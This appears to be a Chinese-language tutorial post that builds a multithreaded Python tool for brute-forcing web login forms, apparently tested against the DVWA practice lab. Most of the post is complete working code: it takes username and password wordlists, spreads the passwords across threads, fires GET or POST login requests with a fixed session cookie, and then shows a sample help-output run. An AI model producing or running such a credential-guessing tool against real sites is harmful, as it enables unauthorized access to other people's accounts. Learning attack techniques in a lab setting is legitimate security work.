账号密码爆破
大致流程
graph TD
st[程序开始执行] --> op(程序各项参数说明)
op --> op1(requests编写一个扫描模块)
op1 --> op2(对读取到的密码分配给指定的线程 注意向上取整)
op2 --> op3(读取name,调用多线程模块实现多线程)
op3 --> op4[程序结束]
根据程序需要选用optparse来实现程序对于参数的接受和程序--help功能的实现, math模块实现多线程的时候程序向上取整, 使password全部被分配到线程里面, 调用requests实现post和get类型的请求, threading模块实现多线程功能.
-
导入相应的模块
import optparse import math import threading import requests
-
程序说明(--help信息)
parser = optparse.OptionParser() parser.usage = "web_burte_command.py -u url -n user_file -p pass_file -t num" parser.add_option("-u", "--site", dest = "website", help = "website to test", action = "store", type = "string", metavar = "URL") parser.add_option("-n", "--namefile", dest = "namefile", help = "name from file", action = "store", type = "string", metavar = "NAMEFILE") parser.add_option("-p", "--passfile", dest = "passfile", help = "pass from file", action = "store", type = "string", metavar = "PASSFILE") parser.add_option("-t", "--threads", dest = "threads", help = "num of threads", action = "store", type = "string", metavar = "THREAD") (options, args) = parser.parse_args() ths = int(options.threads) pass_dic = options.passfile user_dic = options.namefile site = options.website
-
requests实现扫描模块(注意爆破的时候是get类型还是post类型)
def scan(payload): user = payload["username"] threads_pass_list = payload["pass_list"] for password in threads_pass_list: # r = requests.post(url = site, data = {"username":user, "password":password.strip(), "submit":"submit"}) # 根据实际情况修改相应的参数 r = requests.get(url = site, params = {"username":user, "password":password.strip(), "Login":"Login"}, headers = {"Cookie":"security=high; security=high; PHPSESSID=lip25ut7pltp2nkjrgd68l9fq5"}) print (str(len(r.text)) + "username: "+user+" ; "+"password : "+password + "\n")
-
password分配到每个线程里面
# 新建一个密码字典列表 [[],[],[]] pass_list = [] result_num = 0 # 每个线程要读取的行数 # 根据线程数确定每一项当中的行数,一个线程读取多少行密码 # 第一步:确定pass的行数 with open(pass_dic, "r") as f: temp_list = f.readlines() temp_thread_list = [] num = len(temp_list) # 根据临时列表的项数除以线程数 得到每一线程中的项数 result = num / ths # 第三步获取向上取整的行数math.ceil(num / ths) # if num % ths == 0: # result = num / ths # else: result = math.ceil(num / ths) result_num = result flag = 0 for line in temp_list: flag += 1 temp_thread_list.append(line.strip()) # 去除换行 if flag == result_num: flag = 0 pass_list.append(temp_thread_list) temp_thread_list = [] pass_list.append(temp_thread_list)
-
读取name文件并且开启多线程功能
# payload - > pass_list 结合用户名字典来进行确定 # 使用线程列表 ths_list = [] with open(user_dic, "r") as f: user_list = f.readlines() for user in user_list: for pass_line in pass_list: payload = {"username":user.strip(), "pass_list":pass_line} ths_list.append(threading.Thread(target = scan, args = (payload, ))) for th in ths_list: th.start()
-
程序试运行
pig@deep:~/Desktop/web_pass_burte$ ls name.txt pass.txt web_burte_command.py pig@deep:~/Desktop/web_pass_burte$ python3 web_burte_command.py --help Usage: web_burte_command.py -u url -n user_file -p pass_file -t num Options: -h, --help show this help message and exit -u URL, --site=URL website to test -n NAMEFILE, --namefile=NAMEFILE name from file -p PASSFILE, --passfile=PASSFILE pass from file -t THREAD, --threads=THREAD num of threads pig@deep:~/Desktop/web_pass_burte$
网友评论